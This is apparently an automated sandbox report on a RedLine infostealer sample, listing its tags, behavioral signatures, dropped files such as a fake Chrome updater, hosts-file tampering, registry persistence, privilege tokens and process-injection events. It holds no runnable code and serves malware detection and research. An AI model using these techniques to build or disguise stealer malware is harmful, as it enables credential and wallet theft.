Malware Analysis Report

2025-01-18 08:00

Sample ID: 230812-y4h2aagb9v
Target: 28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa
SHA256: 28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa
Tags: redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa

Threat Level: Known bad

The file 28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa was found to be: Known bad.

Malicious Activity Summary

Tags: redline logsdiller cloud (tg: @logsdillabot) evasion infostealer persistence spyware stealer themida

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

Stops running service(s)

Downloads MZ/PE file

Drops file in Drivers directory

Themida packer

Executes dropped EXE

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-08-12 20:20

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-08-12 20:20

Reported: 2023-08-12 20:22

Platform: win10-20230703-en

Max time kernel: 148s

Max time network: 145s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

Tags: infostealer redline

Downloads MZ/PE file

Drops file in Drivers directory

Description | Indicator | Process | Target
File created | C:\Windows\System32\drivers\etc\hosts | C:\Windows\Temp\setup.exe | N/A
File created | C:\Windows\System32\drivers\etc\hosts | C:\Program Files\Google\Chrome\updater.exe | N/A

Stops running service(s)

Tags: evasion

Reads user/profile data of web browsers

Tags: spyware stealer

Themida packer

Tags: themida

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (x16)

Accesses cryptocurrency files/wallets, possible credential harvesting

Tags: spyware

Adds Run key to start application

Tags: persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000\Software\Microsoft\Windows\CurrentVersion\Run\AppLaunch = "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe\"" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Temp\setup.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 504 set thread context of 1944 | N/A | C:\Users\Admin\AppData\Local\Temp\cli.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1220 set thread context of 756 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe
PID 1220 set thread context of 4184 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\explorer.exe

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Temp\setup.exe | N/A
File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

Tags: persistence

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe | N/A (x3)
N/A | N/A | C:\Windows\Temp\setup.exe | N/A (x2)
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (x3)
N/A | N/A | C:\Windows\Temp\setup.exe | N/A (x6)
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (x4)
N/A | N/A | C:\Windows\Temp\setup.exe | N/A (x2)
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A (x3)
N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A (x2)
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (x3)
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A (x3)
N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A (x6)
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (x3)
N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A (x4)
N/A | N/A | C:\Windows\explorer.exe | N/A (x20)

Suspicious behavior: LoadsDriver

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 33 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 34 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 35 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: 36 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cc.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4796 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4796 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4796 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4796 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4796 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 4796 wrote to memory of 504 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2884 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 2884 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 504 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4796 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4796 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4796 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\28d29873eefa7a433f5663480bf805bfd360c1718ef780a7daa53380b22b05fa.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 3716 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3716 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 3608 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 3608 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4908 wrote to memory of 2508 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
